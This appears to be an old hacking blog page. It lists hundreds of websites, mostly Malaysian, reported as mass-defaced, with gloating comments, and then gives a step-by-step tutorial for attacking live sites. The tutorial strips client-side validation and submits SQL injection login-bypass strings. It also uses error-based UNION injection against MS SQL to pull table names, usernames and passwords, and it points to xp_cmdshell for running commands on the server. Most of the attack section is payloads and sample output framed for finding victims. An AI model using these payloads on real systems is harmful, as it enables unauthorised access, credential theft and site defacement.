More than 400 Websites Hacked yesterday, majority were Malaysians

Hi, :) More than 400 websites got mass defaced by hacker yesterday. Under the list of victims most of them were Malaysian websites. Here’s a list of victims Check if your domain is part of the defacementation. Full list of defaced website after jump.



aboycalledsu.hazardcell.com
g2h.hazardcell.com
hazardcell.com
url.hazardcell.com
tk.hazardcell.com
webbuilder.com.my orders.webbuilder.com.my
support.webbuilder.com.my
ime.sscity.net
tribezone.net
myhome.net.my
mp3players.allnetweb.info
pvr-sabah.north-borneo.com
ramlanabdullah.fotomomo.com
burnz.teruja.com
emalaysiatravel.gbavatar.com
audio.emirin.name
304.webactives.com
dating-site.date2u.com
secretstrategy.ringgithit.com
eisnetz.com
ramakrishna-sarada.org
alumni.ixora.biz
diyersitzone.net
my.mtsociety.com
blog.reriki.net
cy.mrdefinite.com
blog.teruja.com
susuday.mollique.com
bigcow.mollique.com
sawadeepool.com
kongkong.gbavatar.com
p7.cablefault.net
xchange-i.com
blogrss.bodypowerfc.com
cflee.diyersitzone.net
fotos.dlrg.d-f-n.com
rangsangmas.rajeshpal.com
cft-articles.com
mandarinuniversity.koobros.net
maplestory.gbavatar.com
mensexualhealth.net
procom.mymegashop.com
forex.getprofit.net
shop.makeitlove.com
qionlee.com
proxy.sscity.net
dolphinet.net
planet.tauhoo.com
webactives.com
iklanimej.com
myfriendaddersecret.ringgithit.com
cmaxsoft.com
board.eisnetz.com
go.derrickflc.com
entwurvian.nocturnius.com
amriteswarifoundation.org
nicheinfoproduct.com
perananglobal.com
rajinder.gandhara.org
doe-gis.net
wanida.myrakanit.com
gradhan.com
q2df.com
wangberkat.com
adinfoservices.com
engkabang.net
sahoca.net
blog.gbavatar.com
p1.sawadeepool.com
mollique.com
desirehouse.net
phpnuke.pm10freaks.com
homeideas.myhome.net.my
ainasakina.myfamili.net
www3.drismailtambi.com
alifjohan.myfamili.net
biz.tauhoo.com
photo.emirin.name
suhailaagency.xchange-i.com
ftcomp.com
uniquecanyon.dgvmedia.com
smksb.edu.my
makeitlove.com
projectsecretariat.net
netclicksolution.com
asianmath.com
tactle.com
gandhara.org
gpix.derrickflc.com
acmeuniversity.koobros.net
aprilng.virgiesphere.net
studiow.filament-phase.com
wekgna.com
jordanje.com
stromberg-malaysia.com
linkcom.dgvmedia.com
weightdilemma.com
mpmku.akalkita.com
etacmedia.com
video.emirin.name
gunbound.gbavatar.com
ixoracommy.ixora.biz
firstummah.com
designs.melvinel.com
kuching2u.myhome.net.my
cyberjayaonline.com
mybigcoworg.mollique.com
worldprivilege.dgvmedia.com
halmie.com
archerz.net
forexdaily.3rdpartyexchange.com
project.emirin.name
myfamili.net
indesignbuild.inbanglow.com
ramadhan1428.xchange-i.com
siu.rajeshpal.com
1.mdzakri.com
sar-alhidayah.lamanwebsekolahku.com
loan.ringgithit.com
project.netclicksolution.com
tauhoo.com
nocturnius.com
forum.engkabang.net
citogroup.com.my
prepaid.lorongstadium.com
forum.senilensa.com
118plugins.ringgithit.com
swisscash.halmie.com
download2u.info
getprofit.net
timetothrift.com
home.gandhara.org
senilensa.com
groomingdales.com.my
emirin.name
buyatheme.com
triptomalaysia.webactives.com
acemaildrop.com
koobros.net
heartchambers.lunaireave.com
uptownace.gradhan.com
chungsan.net
rajeshpal.com
loans.ringgithit.com
fabuloushampers.filament-phase.com
mysite2u.biz
dearlainey.drismailtambi.com
koobrosbiz.koobros.net
intouch-logistics.com
img.eisnetz.com
gsus.biz
mpmku.xchange-i.com
meridiantouch.filament-phase.com
mtsociety.com
muftizab.com
tahooorg.tauhoo.com
knightonline.gbavatar.com
shoppe.north-borneo.com
ixora.biz
photos.mrdefinite.com
p9sport.com
i-smartsolutions.com
guestbook.emirin.name
adsense-profits-unlimited.com
hijabhaven.com
eimir.com
borneotransway.com.my
ramadhan.xchange-i.com
nagawerks.com
yippeego.yippeego.com
plaza.abiummi.com
gempaq.us
mohram.filament-phase.com
lotuswell.com
myrakanit.com
karyastudio.drismailtambi.com
tools.eisnetz.com
zhongg.com
free.educationaltoygifts.com
sks.educationaltoygifts.com
m3lvin.org
enochlau.com
filme.d-f-n.com
habbohotel.gbavatar.com
sgt.sabahbiz.com
meatballicious.net
adsenseseo.ringgithit.com
wwluck.etacmedia.com
biase.myxstream.org
female.drismailtambi.com
kelabremajamutiara.com
blog.emirin.name
blog.makeitlove.com
1.lunaireave.com
m203.gandhara.org
myhome.myhome.net.my
cathcollections.com
yippeego.com
forex.3rdpartyexchange.com
onlinestore.diyersitzone.net
vl.bodypowerfc.com
aushk.com
forum.seacoco.com
alphagiga.com
arepie.myxstream.org
pehome.dgvmedia.com
xpatmigrate.com
thenamecard.mysolobiz.com
shamshubaridah.myfamili.net
xiii.myrakanit.com
video.sscity.net
maricatur.mari4syafie.com
ehome.myhome.net.my
5dollar-egold.com
behindnews.emuse.cc
fromborneo.com
jeremiahfoo.emuse.cc
serambetul.com
brilliantcolorsthatyoubring.net
smkcyberjaya.allmoresynergy.com
tajulhealth.com
beautiful.mrdefinite.com
azrinhs.com
ringgithit.mensexualhealth.net
allnetweb.myfancyshop.com
jcc.gandhara.org
gateraiders.com
defirstinn.com.my
jomcode.drismailtambi.com
blog.bodypowerfc.com
2ndstuff.diyersitzone.net
forum.kaerazami.com
joininvest.com
sirehjunjung.com
kristalutama.rajeshpal.com
365.emuse.cc
magnitudesalon.flamingmarket.com
noirmystere.nocturnius.com
skuld.miyabiaizawa.com
davelynne.com
materealize.filament-phase.com
foochowgateway.swancity.net.my
nurarief.intouch-logistics.com
alam3d.com
bahteracappucino.com
kelzero.graveyardstudio.com
cherylsamad.filament-phase.com
xecom.projectsecretariat.net
sk-srikelana.lamanwebsekolahku.com
toolbar.sscity.net
date2u.drismailtambi.com
ustazshukri.drismailtambi.com
tyronmalaysia.filament-phase.com
live.netclicksolution.com
lionsutera.north-borneo.com
mobalex.com.my
emuse.cc
myxstream.org
1u.com.my
rui-en.com
3rdpartyexchange.com
acnewso.ringgithit.com
ramadhan1427.xchange-i.com
myfren.archerz.net
gurdz.gandhara.org
yewkit.com
malaysiaescapade.zodiascape.com
miyabiaizawa.com
minang.educationaltoygifts.com
educationaltoygifts.com
virgiesphere.net
test.senilensa.com
quiz.dlrg.d-f-n.com
myfancyshop.com
theworldsports.com.my
dog2u.myhome.net.my
smgozz.com
chineseknot.biz
kaerazami.filament-phase.com
esafaree.xchange-i.com
blogs.sammichin.com
bodypowerfc.com
wow.gbavatar.com
worldwebmasters.org
dragonflymxs.filament-phase.com
perfectworld.gbavatar.com
multhalib.fotomomo.com
tenggoldives.com
gratechdesign.sabahbiz.com
allmoresynergy.com
mymegashop.com
vertiglobal.drismailtambi.com
egold2u.3rdpartyexchange.com
cablefault.net
dquorum.com
9bw.lunaireave.com
beauty2k.com
rm.bodypowerfc.com
sloppychic.buyatheme.com
4d8888.com
asic.webactives.com
north-borneo.com
surayabatik.filament-phase.com
koobrosinfo.koobros.net
rawr.studio-ksg.net
photo.engkabang.net
mysolobiz.com
events2u.rajeshpal.com
conqueronline.gbavatar.com
photography.mtsociety.com
graveyardstudio.com
teruja.com
filament-phase.com
blog.ringgithit.com
renee-chung.com
prodgprojects.com
solobiz.mysolobiz.com
zodiascape.com
ip.teruja.com
unlimitedprofitstraffic.ringgithit.com
mdzakri.com
digitalzone.biz
no1invest.com
blog.abiummi.com
demam-afcom.jordanje.com
q4hd.q2df.com
seacoco.com
e-picdorlee.com
howmlmgurusgotrich.com
ime.sscity.net
my.mtsociety.com
myhome.net.my
mp3players.allnetweb.info
pvr-sabah.north-borneo.com
procom.mymegashop.com
burnz.teruja.com
emalaysiatravel.gbavatar.com
audio.emirin.name
304.webactives.com
dating-site.date2u.com
secretstrategy.ringgithit.com
eisnetz.com
ramakrishna-sarada.org
alumni.ixora.biz
blog.reriki.net
mensexualhealth.net
maplestory.gbavatar.com
cy.mrdefinite.com
tribezone.net
blog.teruja.com
susuday.mollique.com
bigcow.mollique.com
sawadeepool.com
kongkong.gbavatar.com
p7.cablefault.net
xchange-i.com
blogrss.bodypowerfc.com
cflee.diyersitzone.net
fotos.dlrg.d-f-n.com
electronics-directory.download2u.info
sammichin.diyersitzone.net
ilammotel.co.nz
reriki.net
akalkita.xchange-i.com
ragnarok.gbavatar.com
blog.diyersitzone.net
ceria.gempaq.us
ou.gradhan.com
millionaire-factory.net
inbanglow.com
blog.filament-phase.com
pbamonline.com
freeon9.q2df.com
gallery.sahoca.net
url.eisnetz.com
jobsmalaysia.download2u.info
bigwheelsabah.com
bigcoworg.mollique.com
julian.bigwheelsabah.com
hasansaid.myfamili.net
lorongstadium.com
suribia.com
matchwonder.mymegashop.com
swancity.net.my
dimira.net
mysecretstrategy.ringgithit.com
ambangideal.com
pssgm.reriki.net
louyau.net
matchmakerz.yippeego.com
engineers-hut.com
pm10freaks.com
mrdefinite.com
gpgc2u.dgvmedia.com
joomla.pm10freaks.com
gallery.miyabiaizawa.com
doa-member.myrakanit.com
blog.azrinhs.com
forums.ti-server.com
chat.netclicksolution.com
bbs.halobi.com
testbbs.halobi.com
calculator.sscity.net
boochang.worldwebmasters.org
dndkl.nagawerks.com
axisgrade.com
fengshui-geomancy.koobros.net
okayarms.jordanje.com
aimm.rajeshpal.com
ericool.webactives.com
electricalshop.com.my
nasa.com.my
test.gandhara.org
flamingmarket.com
addict-logic.net
econcept.dolphinet.net
iccclub.dgvmedia.com
intimanis.com
dgvmedia.com
blogazine.emuse.cc
music.melvinel.com
i-privileges.dgvmedia.com
borneotreasure.com
4irobot.com
biase.myxpitstop.com
tombogroup.filament-phase.com
jomlayanbiz.com
spatialglobe.com
devilro.org
swancitynet.swancity.net.my
youzi.emuse.cc
mobilestore2u.com
studio-ksg.net
lunaireave.com

wahahahahahaa :) MONITOR YOUR PC AND SERVER DATABASE ALL AHAHAHAHAHA :P

United Nations Hacked, Birleşmiş Milletler Hacked, Ayyıldız Tim, UN Hacked, BM Hacked, eno7, thehacker

Cyber Protest in world, turkish hacker, by m0sted, 1nd0-H4x0R, ayyildiz tim, youtube, hacker, zone-H.org, zone-h, mirror, kerem125, gsy, m0sted.net, sagopa kajmer, pesimisit, bir 2007, 2008, peace world protest.,eno7



- A funny movie is a click away

Basic Website Acct. Hacking

If you posess the HTML & JAVA knowledge then u can even acess password protected websites.

To hack a Password Protected Websites just follow these steps: -

* Open the website u want to hack. Provide wrong username-password.
(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
ur work starts from here...

* Right click anywhere on that page =>> go to view source.

* There u can see the html codings with javascripts.

* Before this login information copy the url
of the site in which you are.


* Then delete the java script from the above that validates ur
informaiton in the server.(Do this very carefully, ur success to
hack the site depends upon this i.e how efficiently u delete the
Javascripts that validate ur account information)



then look for...code ..: input name="password" type="password"
=> replace
there instead of . See there if
maxlength of password is less than 11 then increase it to 11
(e.g : if then write

* Just go to file => save as and save it any where within
the hardisk with ext.html(e.g :c:hack.htm)

* Close ur webpage and go to the webpage u save in your
harddisk(e.g : c:hack.htm) Open it.

* U see that some changes in current page as compared to original
One. Don't worry.

* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!U hav cracked the above website and entered into the
account of Ist user saved in the server's database.

☺ ☺ ☺ ☺ The above trick doesn't work on the websites using latest
technique to protect there servers. ☺ ☺ ☺ Enjoy ☺ ☺ ☺ ☺ ☺

Hacking Database Servers

Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company . Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and al so the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database serve rs. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itsel f to be "unbreakable" But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a fe w months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with t hem a lot.

user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the loginche ck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of l ogin failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry ag ain.



"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the abo ve query will become

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. N ow what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web desi gner ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same ti me 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doe sn't work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide

Chintan ' --
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the abo ve mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.co m/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using querie s in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a vict im just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. T he same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.as ... pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method show s up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given valu e Chintan. And different variables are separated by operator '&'.

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the q uery in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will ge t different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAM E which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarch ar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error conve rting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords So lets move in i t. Type the following in the URL

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COL UMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COL UMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we woul d use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is noth ing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the i mportant ones are

sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password 'oldpass', 'newpass', 'username'

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server

version including the all info about the OS.
e.g. master..xp_msver REMEMBER USE YUR OWN RISK !!!!!!!!